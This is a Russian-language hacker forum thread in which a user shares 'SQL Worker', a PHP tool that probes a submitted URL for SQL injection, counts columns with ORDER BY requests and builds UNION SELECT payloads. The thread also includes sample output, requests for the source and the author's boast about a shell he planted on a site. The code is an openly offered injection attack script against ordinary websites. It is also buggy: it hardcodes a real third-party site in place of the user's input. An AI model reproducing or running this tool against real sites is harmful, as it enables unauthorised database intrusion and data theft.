Sql Worker by [ac1D]

Буквально за вечер накодил простенький скрипт, который подбирает колоночки к скулям по одной штуке
Тыц

 

Базу SQL собираешь?))

 

Молодец мэн

 

скинь в личку скрипт плиз

 

ввожу 1 сайт,выдает другой.

 

а ест прога для подбора колонок?

 

Toolza от Пашкелы

 

Сурс достанется тому кто первый похекает сайт или найдет мой шелл ))
Поправил ошибочку одну, теперь работает как часы)

 

А я думал, хостинг в Австралии стоит очень дорого.

 

PHP:

<?php
#####################
#  Coded            #
#        by         #
#  ©2010    [ac1D]  #
#####################
set_time_limit(0);
ignore_user_abort(1);
error_reporting(0);

if (isset($_POST['site']))
{
function gen_cols($count)
{
    $deff = "-999.9+union+select+";
    for ($i=1;$i<=$count;$i++)
    {
        $deff .= ",$i";
        if ($i == $count)
        {
            $deff .= "--";
            break;
        }
    }
    $deff = str_replace("+,", "+", $deff);
    return $deff;
}

function check_mysql($site)
{
    $html0 = file_get_contents($site."+and+1=1--");
    $html1 = file_get_contents($site."+and+1=2--");
    if ($html0 != $html1)
    {
        return true;
    }
    else
    {
        return false;
    }
}

function order_by($site)
{
    $html0 = file_get_contents($site."+order+by+999--");
    for ($i=1;i<30;$i++)
    {
        $html1 = file_get_contents($site."+order+by+$i--");
        if ($html0 == $html1)
        {
            if ($i != 0)
            {
                echo "[ order by <font color=#00ff00>".($i-1)."</font> ]<br>";
                flush();
            }
            return $site.gen_cols(($i-1));
        }
        if ($i != 0)
        {
            echo "[ order by <font color=#ff0000>".($i-1)."</font> ]<br>";
            flush();
        }
    }
}

$site = $_POST['site'];

if (check_mysql($site))
{
    echo "[ <font color=#00ff00>Vulnuruluable</font> ]<br>";
    flush();
    $sql = order_by("http://www.losingtoday.com/tales.php?id=15");
    echo "<a href=$sql><font color=#000000>[ $sql ]</font></a>";
    fputs(fopen("good.txt", "a+"), $sql." [ ".$_SERVER['REMOTE_ADDR']." ]\r\n");
}
else
{
    echo "[ <font color=#ff0000>Not vulnuruluable</font> ]<br>";
    flush();
}
}
else
{
    print '<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Enter_Title_Here</title>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<meta name="generator" content="BestAddress HTML Editor Professional">
</head>
<body bgcolor=#333333 text=#008899><center><br><br><br><br><br>
<TABLE style="border: solid 1px;border-color: #008899;background-color:#333333;color: #009999" width="452">
  
  <TR>
    <TD><marquee><FONT size=4 face=consolas>Welcome to [SQL 
      Worker]</FONT></marquee><br><br></TD></TR><TR><TD>
      <Form method=POST>
      <input type=text value="http://site.com/bank.php?card=13" name=site style="border: solid 1px;border-color: #008899;background-color:#333333;color: #009999;width:75%"> - Path 2 script<br><br>
      <input type=Submit value="Check it!" style="border: solid 1px;border-color: #008899;background-color:#333333;color: #009999">      
      </form>
      </TD></TR></TABLE>
</center>
</body>
</html>';
}
?>


Бог с вами) решил выложить этот скрипт, который подбирает колонки.

 

Кстати если твой сайт проскакивать ...
[ Vulnuruluable ]
[ order by 0 ]
[ order by 1 ]
[ order by 2 ]
[ http://www.chris-mohan.com/sqlworker/-999.9+union+select+1,2-- ]

 

Ужас.